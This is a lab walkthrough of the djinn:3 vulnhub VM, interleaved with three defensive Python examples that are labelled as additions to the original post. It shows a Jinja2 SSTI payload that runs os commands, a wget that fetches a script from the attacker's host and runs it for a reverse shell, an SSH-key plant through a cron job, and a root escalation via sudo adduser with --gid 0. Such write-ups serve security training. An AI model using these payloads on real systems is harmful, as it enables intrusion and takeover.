djinn:3 vulnhub Walkthrough
I am back with another article, which is going to be full of new methods and privilege escalation techniques. The only reason I was not writing any blog posts was this VM (djinn3, a very good VM from vulnhub), and finally, after a lot of failures, I got root on it. Okay, so let's start.
Walkthrough
IP of the target : 192.168.1.55
As usual, I started with an nmap scan to find the open ports and the services running on the system, using the command
nmap -sC -sV -Pn 192.168.1.55

I got so many open ports; maybe port 80 can help me with enumeration, so let's start there.

Okay, we have a website on port 80. I tried visiting every page listed in the nav bar but got nothing, so now it's time for directory brute-forcing. I personally like wfuzz because of its cleaner interface (you can use any tool you want).
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --hc 404 http://192.168.1.55/FUZZ
But I got nothing except /images with a 301 and /~checkout~ with a 403. Then I changed my wordlist to /dirb/big.txt and still got nothing except /~sys~, which is also forbidden. I don't know whether the ~checkout~ and ~sys~ directories are going to be useful for me or not, so I proceeded to the next port, 5000.

We have ticketing software. The most interesting line I found is "Under Development", which suggests this web app may have security issues. I clicked on the open link and found another web page with a GET parameter "id".

Hmm, smells like SQL injection, but it was not; I tried a lot but got nothing :(
Okay, the next port we have is 31337. I tried connecting to this port using nc.

I tried almost every common username and password, but none of them worked. Then I started searching on the internet for common credentials and found one with
username => guest
password => guest
And yes, this worked. I was feeling so dumb at this point; how could I forget such an easy password :(
Anyway, let's continue with the application we have on port 31337.

I can perform so many options here. I started with close (close an existing ticket).

I tried to close a non-existent ticket with id 1234 and got no output. Next I tried a valid ticket id I had found on port 5000, 2973, and after this I visited the page on port 5000 again, and yes, this ticket is actually deleted.
The next option I tried was open (open a new ticket).

Again I visited the page on port 5000 and found a new ticket with the title "check", which means this function is working too. I tried including some file names like /etc/passwd to check whether we can get LFI or RFI here, but got nothing. After spending a lot of time with this application I still had nothing.
I checked the nmap scan again and found this line: 5000/tcp open http Werkzeug
Searching on Google about this revealed useful information.

Hmm, that was a big hint for me: it means the whole application is developed using Flask, and Flask applications can be vulnerable to SSTI (Server-Side Template Injection). I found a GitHub repository, PayloadsAllTheThings, and after working through it I found that this application is using Jinja2, because if we give the input {{7*'7'}} then the output is 7777777.

Again I opened the web app on port 5000, clicked on the link, and got this result.

I was on the right path, but "some payloads don't work exactly the way they are written", so after a lot of tries to get RCE from SSTI, I succeeded with the payload:
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
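From the defender's side, the arithmetic probe and the object-walk payload above are both easy to spot in web server logs, because the GET parameter arrives URL-encoded and decodes to template syntax that no legitimate ticket id contains. The following is an added example (not code from the original post or from the djinn3 VM) that decodes request paths from a few constructed access-log lines and scores them by indicator strength; the log format, the `/open?id=` endpoint and the threshold are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post). The last
# two mimic the kind of template-probe traffic the post describes against the
# port 5000 ticketing app; the first two are ordinary ticket lookups.
SAMPLE_LOG = """\
192.168.1.103 - - [01/Jan/2021:10:00:01 +0000] "GET /open?id=2973 HTTP/1.1" 200 512
192.168.1.103 - - [01/Jan/2021:10:00:05 +0000] "GET /open?id=1234 HTTP/1.1" 404 120
192.168.1.103 - - [01/Jan/2021:10:02:11 +0000] "GET /open?id=%7B%7B7*%277%27%7D%7D HTTP/1.1" 200 512
192.168.1.103 - - [01/Jan/2021:10:03:40 +0000] "GET /open?id=%7B%7Bconfig.__class__.__init__.__globals__%5B%27os%27%5D.popen%28%27id%27%29.read%28%29%7D%7D HTTP/1.1" 200 640
"""

# Common log format: client, ident, user, [timestamp], "METHOD path PROTO", status
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators ordered from weak (any template expression) to strong (reaching os).
# Weights are an assumption; tune them to your own traffic.
INDICATORS = [
    ("template_expr", re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S), 1),
    ("arith_probe",   re.compile(r"\{\{\s*\d+\s*\*\s*['\"]?\d+['\"]?\s*\}\}"), 2),
    ("dunder_walk",   re.compile(r"__(class|init|globals|subclasses|mro|builtins)__"), 3),
    ("os_exec",       re.compile(r"\b(popen|system|subprocess|import_module)\b"), 4),
]


def score_request(path):
    """Return (score, [indicator names]) for one raw (still URL-encoded) request path."""
    decoded = unquote_plus(path)
    hits = [name for name, rx, _ in INDICATORS if rx.search(decoded)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def scan_log(text, threshold=3):
    """Parse access-log lines and return alert records for requests scoring >= threshold."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash the scan
        score, hits = score_request(m["path"])
        if score >= threshold:
            alerts.append({
                "src": m["src"],
                "ts": m["ts"],
                "status": int(m["status"]),
                "score": score,
                "indicators": hits,
                "path": unquote_plus(m["path"]),
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f'{alert["ts"]} {alert["src"]} score={alert["score"]} '
              f'{alert["indicators"]} {alert["path"]}')
```

The threshold of 3 is chosen so that a lone `{{...}}` in a parameter (score 1) is not alerted on by itself, while the `{{7*'7'}}` probe (template expression plus arithmetic, score 3) and anything that walks `__globals__` toward `os` are. A 200 status on an alerted request is the detail worth escalating: it means the application rendered the expression rather than rejecting it.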


Now I just have to pop a shell. Without any further checking, I assumed this system had PHP installed, uploaded the pentestmonkey reverse shell to the /tmp directory, and wasted almost 10 minutes figuring out why this PHP script was not executing. Then I changed my command to
{{config.__class__.__init__.__globals__['os'].popen('ls /usr/bin/').read()}}
Using this I found that Python is installed, so I can use a Python script to pop a shell (again I was feeling so dumb; how could I forget to check whether PHP is there or not).

{{config.__class__.__init__.__globals__['os'].popen('wget http://192.168.1.103:8000/exp.py -O /tmp/exp.py').read()}}

I opened the web page on port 5000 and after I clicked on the link, my Python script was saved to the /tmp/ directory.

Next I started a listener on port 1234 and changed the payload to
{{config.__class__.__init__.__globals__['os'].popen('python /tmp/exp.py').read()}}
and after clicking on the link I got the reverse shell :)

Popped the reverse shell :)

After some enumeration I found two important files in the /opt/ directory.

I transferred these files to my local system and decompiled them with uncompyle6, and as a result I got two .py files.
After reading the code many times I found some important pieces of code.
Content of file1 =>


Content of file2 =>

Now, after understanding these two pieces of code, I ran pspy on the target machine and found that a cron job is running as user saint (we have three users: saint, mzfr, jack).
According to the Python code, I created a JSON file in the /tmp directory named ****.config.json, which will download the id_rsa.pub key to the directory I specified (so I tried /home/saint/.ssh/authorized_keys), and yes, it worked, so now I can get access as user saint.
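The root cause here is a scheduled job that reads a world-writable JSON config and writes a downloaded file wherever the config says, including into its own ~/.ssh. The post blurs the real code, so the following is an added example of my own (not the VM's script) showing the check such a job should make before writing: a constructed config with assumed keys `url` and `destination`, a fixed base directory the job is allowed to write under, and a validator that rejects absolute paths, `..` escapes, symlink escapes (via `realpath`) and dotfile targets.

```python
import json
import os

# Constructed example configs (not the blurred one from the post). The key
# names "url" and "destination" are assumptions for illustration.
SAFE_CONFIG = json.dumps({
    "url": "http://example.invalid/id_rsa.pub",
    "destination": "incoming/keys.pub",
})
ESCAPING_CONFIG = json.dumps({
    "url": "http://example.invalid/id_rsa.pub",
    "destination": "../.ssh/authorized_keys",   # parent-directory escape
})
ABSOLUTE_CONFIG = json.dumps({
    "url": "http://example.invalid/id_rsa.pub",
    "destination": "/home/saint/.ssh/authorized_keys",  # absolute path
})


def safe_destination(base_dir, requested):
    """Return the absolute path for `requested` only if it stays inside base_dir.

    Raises ValueError for absolute paths, paths that resolve outside base_dir
    (including via `..` or symlinks), and any hidden file or directory component,
    so a config can never steer the job into .ssh or similar.
    """
    if os.path.isabs(requested):
        raise ValueError("absolute destination not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("destination escapes base directory")
    rel = os.path.relpath(target, base)
    if any(part.startswith(".") for part in rel.split(os.sep)):
        raise ValueError("hidden files/directories not allowed")
    return target


def validate_config(raw_json, base_dir):
    """Parse the job config and return a dict with a vetted absolute destination."""
    cfg = json.loads(raw_json)
    url = cfg.get("url")
    dest = cfg.get("destination")
    if not isinstance(url, str) or not url.startswith(("http://", "https://")):
        raise ValueError("invalid url")
    if not isinstance(dest, str):
        raise ValueError("destination missing")
    return {"url": url, "destination": safe_destination(base_dir, dest)}


def config_is_safe(raw_json, base_dir):
    """Convenience wrapper: True if the config passes validation, False otherwise."""
    try:
        validate_config(raw_json, base_dir)
        return True
    except (ValueError, json.JSONDecodeError):
        return False


if __name__ == "__main__":
    base = "/tmp/jobdrop"  # assumed directory the job is allowed to write under
    for label, raw in [("safe", SAFE_CONFIG), ("escaping", ESCAPING_CONFIG),
                       ("absolute", ABSOLUTE_CONFIG)]:
        print(f"{label}: {'accepted' if config_is_safe(raw, base) else 'rejected'}")
```

The path check is only half of the fix: the config file itself should live somewhere only the job's owner can write, not in /tmp, so that an attacker-controlled file is never read in the first place.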

As we can see, the server received a response code 200, which means I am on the right path. Now, with the help of the command ssh saint@192.168.1.55, I was in as user saint.

Now, after getting a shell as user saint, I checked the user's sudo privileges with the command sudo -l and found this:

It means user saint can add a user, so if we remember the adduser command options, there is an option to specify the GID. So I used the command
sudo -u root /usr/sbin/adduser yash --gid 0
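Letting a user run adduser through sudo is effectively root, because, as above, the new account can be placed in the root group. An account whose primary group is 0 does not show up in `sudo -l` and is easy to miss in a review, so the following added example (mine, not from the post) parses a constructed /etc/passwd excerpt and flags every non-root account with UID 0 or primary GID 0; the usernames and ids are constructed to mirror the situation described, not taken from the VM.

```python
# Constructed /etc/passwd excerpt (not copied from the VM). The "yash" line
# shows the shape of an entry created with `adduser yash --gid 0`: an ordinary
# UID but primary group 0.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
saint:x:1000:1000:saint,,,:/home/saint:/bin/bash
mzfr:x:1001:1001::/home/mzfr:/bin/bash
jack:x:1002:1002::/home/jack:/bin/bash
yash:x:1003:0:,,,:/home/yash:/bin/bash
"""


def parse_passwd(text):
    """Parse passwd-format text into a list of dicts (name, uid, gid, home, shell)."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        entries.append({
            "name": name,
            "uid": int(uid),
            "gid": int(gid),
            "home": home,
            "shell": shell,
        })
    return entries


def find_privileged_accounts(entries):
    """Return (name, reason) pairs for non-root accounts with UID 0 or primary GID 0."""
    findings = []
    for e in entries:
        if e["name"] == "root":
            continue
        if e["uid"] == 0:
            findings.append((e["name"], "uid 0 (root-equivalent account)"))
        elif e["gid"] == 0:
            findings.append((e["name"], "primary group 0 (root group)"))
    return findings


def audit_passwd_text(text):
    """Parse and audit in one step; handy for feeding the real file from a host."""
    return find_privileged_accounts(parse_passwd(text))


if __name__ == "__main__":
    for name, reason in audit_passwd_text(SAMPLE_PASSWD):
        print(f"{name}: {reason}")
```

On a real host, feed it `open("/etc/passwd").read()`; anything it reports that you did not create deliberately warrants the same scrutiny as an unexpected sudoers entry.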

After spending some time with the system, I found that I could read the /etc/sudoers file, and found this interesting thing.

It means we need to create a new user with the name jason; okay, I did the same thing after changing back to user saint.

Now, from the sudoers file, I know that user jason can run some command without any password as user root, so I took help from GTFOBins and finally got root.

And this completes our challenge. If you liked the walkthrough then please consider donating to us to keep the website advertisement free :)
NOTE: I have blurred most of the code of those two Python files and also the name of the JSON file in the /tmp directory, because I don't want anybody to be able to get root in just 10-15 minutes. So my main motive for hiding them is that I want you to #try_harder